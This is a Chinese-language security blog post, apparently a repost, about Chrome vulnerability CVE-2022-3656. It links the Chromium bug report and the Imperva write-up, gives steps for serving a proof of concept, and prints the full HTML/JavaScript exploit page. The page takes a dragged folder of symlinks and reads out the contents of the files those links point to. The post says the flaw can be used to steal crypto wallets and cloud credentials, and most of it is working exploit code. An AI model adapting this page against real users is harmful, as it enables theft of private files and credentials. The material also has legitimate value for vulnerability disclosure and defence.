Google Chrome CVE-2022-3656 漏洞

原创

Khan安全团队

发布于 2023-01-28 14:19:41

4500

发布于 2023-01-28 14:19:41

文章被收录于专栏：Khan安全团队Khan安全团队

Imperva Red Team 最近披露了一个名为 CVE-2022-3656 的漏洞，该漏洞影响超过 25 亿 Google Chrome 和基于 Chromium 的浏览器的用户。

此漏洞允许窃取敏感文件，例如加密钱包和云提供商凭据。

漏洞说明：

1. https://bugs.chromium.org/p/chromium/issues/detail?id=1345275#c34

2. https://www.imperva.com/blog/google-chrome-symstealer-vulnerability/

使用说明：

下载poc.zip文件并解压
导航到“fancy-poc”并提供文件 (python3 -m http.server)
打开http://localhost:8000并按照 PoC 说明进行操作

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        * {
            box-sizing: border-box;
        }

        html,
        body {
            margin: 0;
            padding: 0;
            overflow: hidden;
            text-align: center;
            -webkit-font-smoothing: antialiased;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }

        .dropzone {
            border: 3px dashed #3e3e3e;
            display: flex;
            justify-content: center;
            align-items: center;
            font-weight: bold;
            height: 80vh;
            text-transform: uppercase;
            position: fixed;
            top: 50%;
            left: 50%;
            width: 80%;
            transform: translate(-50%, -50%);
        }

        .dropzone input {
            top: 0;
            left: 0;
            opacity: 0;
            display: block;
            position: fixed;
            transform: scale(1000);
        }

        button {
            display: block;
            margin-bottom: 10px;
        }
    </style>
</head>

<body>
    <div class="dropzone">
        Drop folder with symlinks here
        <input onChange="handleFiles(event)" webkitdirectory multiple onClick="handleClick(event)" title=""
            type="file" />
    </div>

    <script>
        const dropzone = document.querySelector(".dropzone");

        function handleFiles(event) {
            document.body.innerHTML = '';
            files = Array.from(event.target.files).filter(f => f.size > 0);
            for (let file of files) {
                let name = file.name;
                let label = document.createElement("button");
                label.innerText = name;
                label.addEventListener('click', async () => {
                    const reader = new FileReader();
                    reader.onload = async () => {
                        alert(reader.result);
                    }
                    reader.onerror = console.error;
                    reader.readAsText(file);
                });
                document.body.appendChild(label);
            }
        }

        function handleClick(event) {
            event.preventDefault();
            alert("Drag and drop a folder with symlinks here");
        }

        document.addEventListener("drop", function (event) {
            dropzone.classList.remove("hover");
        }, false);

        document.addEventListener("dragleave", function (event) {
            event.preventDefault();
            dropzone.classList.remove("hover");
        }, false);

        document.addEventListener("dragover", function (event) {
            event.preventDefault();
            dropzone.classList.add("hover");
        }, false);
    </script>
</body>

</html>

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

安全